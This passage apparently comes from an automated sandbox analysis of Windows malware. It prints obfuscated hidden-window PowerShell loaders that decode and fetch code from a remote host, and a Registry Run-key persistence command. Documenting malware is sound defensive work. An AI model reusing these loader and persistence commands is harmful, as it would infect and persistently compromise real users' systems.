lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,regenteac erudndlidest.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "argumentlistens" /t reg_expand_sz /d "%semicomic% -w 1 $affektationernes=(get-itemproperty -path 'hkcu:\agenetic76\').tautologiske178;%semicomic% ($affektationernes)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$claJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/05/31 02:09:46 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 06/02 01:14:58 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/05/31 02:13:57 Program Manager]
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/05/31 02:09:40 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423060854.00000000060A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|340105828
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
              Source: wab.exe, 0000000B.00000002.3423060854.00000000060A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/06/04 19:43:27 Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB2933 cpuid 11_2_21CB2933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
